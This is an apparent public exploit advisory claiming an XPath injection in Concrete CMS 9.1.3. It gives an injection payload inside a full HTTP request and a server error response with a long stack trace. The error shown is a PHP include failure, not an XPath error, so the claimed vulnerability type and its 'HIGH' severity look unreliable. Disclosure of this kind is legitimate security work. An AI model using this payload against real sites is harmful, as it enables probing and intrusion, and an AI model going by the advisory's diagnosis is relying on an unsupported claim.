Authored by nu11secur1ty

Concrete CMS version 9.1.3 suffers from an XPath injection vulnerability.

## Title: concretecms-9.1.3 Xpath injection
## Author: nu11secur1ty
## Date: 11.28.2022
## Vendor: https://www.concretecms.org/
## Software: https://www.concretecms.org/download
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3

## Description:
The URL path folder `3` appears to be vulnerable to XPath injection attacks.
The test payload `50539478' or 4591=4591--` was submitted in URL path
folder `3`, and an XPath error message was returned.
An attacker can use this vulnerability to flood the system with requests
until he receives the actual paths of all the content of this system,
which may be stored on an internal or external server.

## STATUS: HIGH Vulnerability

[+] Exploits:
00:
```http
GET /concrete-cms-9.1.3/index.php/ccm50539478'%20or%204591%3d4591--%20/assets/localization/moment/js HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
```

[+] Response:

```http
HTTP/1.1 500 Internal Server Error
Date: Mon, 28 Nov 2022 15:32:22 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Powered-By: PHP/7.4.30
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 592153

<!DOCTYPE html><!--


Whoops\Exception\ErrorException: include(): Failed opening
'C:/xampp/htdocs/pwnedhost/concrete-cms-9.1.3/application/files/cache/expensivefea6a13c52b4d4725368f24b045ca8438a865804f8fdcb657cd99682e9392753e7d68124ace56635a578007c2573b03d35376a9b3047decfee81596e3895419.php'
for inclusion (include_path='C:/xampp/htdocs/pwnedhost/concrete-cms-9.1.3/concrete/vendor;C:\xampp\php\PEAR')
in file C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php
on line 26
Stack trace:
1. Whoops\Exception\ErrorException->() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php:26
2. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php:26
3. Stash\Driver\FileSystem\NativeEncoder->deserialize() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem.php:201
4. Stash\Driver\FileSystem->getData() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:631
5. Stash\Item->getRecord() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:321
6. Stash\Item->executeGet() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:252
7. Stash\Item->get() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:346
8. Stash\Item->isMiss() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Cache\Adapter\LaminasCacheDriver.php:67
9. Concrete\Core\Cache\Adapter\LaminasCacheDriver->internalGetItem() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-cache\src\Storage\Adapter\AbstractAdapter.php:356
10. Laminas\Cache\Storage\Adapter\AbstractAdapter->getItem() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:601
11. Laminas\I18n\Translator\Translator->loadMessages() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:434
12. Laminas\I18n\Translator\Translator->getTranslatedMessage() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:349
13. Laminas\I18n\Translator\Translator->translate() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Localization\Translator\Adapter\Laminas\TranslatorAdapter.php:69
14. Concrete\Core\Localization\Translator\Adapter\Laminas\TranslatorAdapter->translate() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\bootstrap\helpers.php:27
15. t() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\blocks\top_navigation_bar\view.php:47
16. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Block\View\BlockView.php:267
17. Concrete\Core\Block\View\BlockView->renderViewContents() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\AbstractView.php:164
18. Concrete\Core\View\AbstractView->render() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Area\Area.php:853
19. Concrete\Core\Area\Area->display() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Area\GlobalArea.php:128
20. Concrete\Core\Area\GlobalArea->display() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\themes\atomik\elements\header.php:11
21. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:125
22. Concrete\Core\View\View->inc() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\themes\atomik\view.php:4
23. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:329
24. Concrete\Core\View\View->renderTemplate() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:291
25. Concrete\Core\View\View->renderViewContents() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\AbstractView.php:164
26. Concrete\Core\View\AbstractView->render() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\controllers\single_page\page_not_found.php:19
27. Concrete\Controller\SinglePage\PageNotFound->view() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Controller\AbstractController.php:318
28. call_user_func_array() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Controller\AbstractController.php:318
29. Concrete\Core\Controller\AbstractController->runAction() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:188
30. Concrete\Core\Http\ResponseFactory->controller() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:95
31. Concrete\Core\Http\ResponseFactory->notFound() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:390
32. Concrete\Core\Http\ResponseFactory->collectionNotFound() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:234
33. Concrete\Core\Http\ResponseFactory->collection() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultDispatcher.php:132
34. Concrete\Core\Http\DefaultDispatcher->handleDispatch() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultDispatcher.php:60
35. Concrete\Core\Http\DefaultDispatcher->dispatch() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\DispatcherDelegate.php:39
36. Concrete\Core\Http\Middleware\DispatcherDelegate->next() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\FrameOptionsMiddleware.php:39
37. Concrete\Core\Http\Middleware\FrameOptionsMiddleware->process() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
38. Concrete\Core\Http\Middleware\MiddlewareDelegate->next() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\StrictTransportSecurityMiddleware.php:36
39. Concrete\Core\Http\Middleware\StrictTransportSecurityMiddleware->process() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
40. Concrete\Core\Http\Middleware\MiddlewareDelegate->next() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\ContentSecurityPolicyMiddleware.php:36
41. Concrete\Core\Http\Middleware\ContentSecurityPolicyMiddleware->process() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
42. Concrete\Core\Http\Middleware\MiddlewareDelegate->next() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\CookieMiddleware.php:35
43. Concrete\Core\Http\Middleware\CookieMiddleware->process() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
44. Concrete\Core\Http\Middleware\MiddlewareDelegate->next() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\ApplicationMiddleware.php:29
45. Concrete\Core\Http\Middleware\ApplicationMiddleware->process() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
46. Concrete\Core\Http\Middleware\MiddlewareDelegate->next() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareStack.php:86
47. Concrete\Core\Http\Middleware\MiddlewareStack->process() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultServer.php:85
48. Concrete\Core\Http\DefaultServer->handleRequest() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Foundation\Runtime\Run\DefaultRunner.php:125
49. Concrete\Core\Foundation\Runtime\Run\DefaultRunner->run() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Foundation\Runtime\DefaultRuntime.php:102
50. Concrete\Core\Foundation\Runtime\DefaultRuntime->run() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\dispatcher.php:45
51. require() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\index.php:2


--><html>
<head>
<meta charset="utf-8">
<meta name="robots" content="noindex,nofollow"/>
<meta name="viewport" content="width=device-width,
initial-scale=1, shrink-to-fit=no"/>
<title>Concrete CMS has encountered an issue.</title>

.......

```


## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3)

## Proof and Exploit:
[href](https://streamable.com/4f60ka)

## Time spent
`03:00:00`